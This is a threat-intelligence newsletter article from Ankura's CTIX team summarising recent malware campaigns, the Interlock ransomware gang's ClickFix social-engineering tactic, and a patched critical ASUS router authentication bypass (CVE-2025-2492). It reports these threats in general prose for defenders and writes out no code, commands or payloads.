ARTICLE
25 April 2025

Ankura CTIX FLASH Update - April 22, 2025

AC
Ankura Consulting Group LLC

Contributor

Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura consists of more than 1,800 professionals and has served 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value. For more information, please visit, ankura.com.
Recent cybersecurity investigations have unveiled a troubling array of threats endangering users and organizations alike.
United States Technology

Malware Activity

Unraveling the Web of Cyber Threats: From Malicious Packages to NFC Exploits

Recent cybersecurity investigations have unveiled a troubling array of threats endangering users and organizations alike. Researchers have uncovered malicious NPM packages pretending to be Telegram bot libraries, which were designed to steal sensitive user information by hijacking API keys and credentials. The rogue packages, named "messenger", "telebot", and "bot-sdk", were cleverly disguised to avoid detection. Which raises concerns about the security of open-source software. Meanwhile, a newly discovered Android malware called "Supercard X", which is designed to exploit stolen credit card information in NFC relay attacks. This malware allows cybercriminals to bypass security measures by using the targeted victim's card information to make contactless payments, effectively stealing from them without physical possession of the card. Security experts warn that the malware not only highlights the vulnerabilities in NFC technology but also poses a significant risk to consumers' financial security. In a concerning turn of events, hackers are reportedly exploiting a Russian bulletproof hosting service to launch attacks, mainly targeting cryptocurrency exchanges and other financial platforms. This service, designed to shield cybercriminals from law enforcement, has become a key component in the ongoing rise of ransomware and phishing schemes. Experts warn that the anonymity provided by such hosting services significantly complicates efforts to trace and prosecute cybercriminals. Lastly, a recent investigation uncovered a sophisticated multi-stage malware attack that leverages JavaScript executables (JSE) and various forms of malware, targeting users primarily through malicious email attachments. The attack begins with a phishing email that tricks victims into downloading a JSE file, which then executes additional payloads, including information stealers and remote access tools. Considering these evolving threats, it is paramount for developers and consumers to exercise caution, bolster their security practices, and enhance their vigilance against potential attacks. CTIX analysts will continue to report on the latest malware strains and attack methodologies.

Threat Actor Activity

Interlock Ransomware Gang Utilizing ClickFix Attack to Push Ransomware

The Interlock ransomware gang has adopted ClickFix attacks, a social engineering tactic, to breach corporate networks and deploy file-encrypting malware. ClickFix involves deceiving victims into executing malicious PowerShell commands under the guise of fixing errors or verifying their systems, leading to malware installation. The use of ClickFix by Interlock marks a growing trend among threat actors employing this method. Launched in late September 2024, Interlock targets FreeBSD servers and Windows systems. It does not operate as a ransomware-as-a-service model but maintains a dark web data leak portal to pressure victims into paying ransoms ranging from hundreds of thousands to millions of dollars. Previously, Interlock used fake browser and VPN client updates for network breaches. As of January 2025, researchers noted Interlock's utilization of ClickFix attacks. Interlock hosted fake CAPTCHA prompts on URLs mimicking Microsoft and Advanced IP Scanner portals, instructing users to execute commands to verify themselves and download promoted tools. Only the site impersonating Advanced IP Scanner led to a malicious installer. The 'Fix it' button copies a dangerous PowerShell command to the victim's clipboard, which, when executed, downloads a 36MB PyInstaller payload. Concurrently, the legitimate AdvanceIPScanner site opens to reduce suspicion. The payload installs genuine software and executes an embedded PowerShell script in a hidden window, registering a Run key for persistence and exfiltrating system info like OS version and user privileges. Researchers observed the command and control (C2) server delivering various payloads, including LummaStealer, BerserkStealer, keyloggers, and Interlock RAT, a simple trojan for file exfiltration and shell command execution. Interlock operators use stolen credentials for lateral movement via RDP, with tools like PuTTY, AnyDesk, and LogMeIn aiding attacks. Before ransomware execution, stolen files are uploaded to attacker-controlled Azure Blobs. The Windows variant of Interlock runs daily at 08:00 PM as a redundancy measure, without causing multiple encryption layers. The ransom note has evolved, emphasizing legal aspects of data breaches. ClickFix attacks are increasingly used by various threat actors, including other ransomware gangs and the North Korean Lazarus group, which targets cryptocurrency job seekers.

Vulnerabilities

Critical AiCloud Authentication Bypass Vulnerability in ASUS Routers Receives Patch

ASUS has disclosed a critical authentication bypass vulnerability affecting multiple router models with AiCloud enabled, which could allow remote attackers to execute unauthorized functions without authentication by sending specially crafted requests. The flaw, tracked as CVE-2025-2492 (CVSS 9.2/10), stems from improper authentication controls in the firmware and impacts devices running firmware branches 3.0.0.4_382, _386, _388, and 3.0.0.6_102. AiCloud, a cloud-based feature that enables remote access to files and media via connected USB drives, increases the potential risk by exposing affected routers to the internet. While no active exploitation or public proof-of-concept (PoC) has been reported, ASUS strongly urges users to apply the latest firmware updates immediately, available through the support portal or product finder page. As an added precaution, users should use strong, unique passwords for both wireless and administrative access. For end-of-life products or scenarios where patching is not feasible due to the negative impact on critical business processes, ASUS recommends disabling AiCloud and all externally accessible services, including WAN access, DDNS, VPN server, DMZ, port forwarding, port triggering, and FTP, to reduce the attack surface and mitigate exploitation risks. CTIX analysts urge all administrators to prioritize mitigating this vulnerability by patching or following the manual defensive measures listed in the advisory.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.

Mondaq uses cookies on this website. By using our website you agree to our use of cookies as set out in our Privacy Policy.

Learn More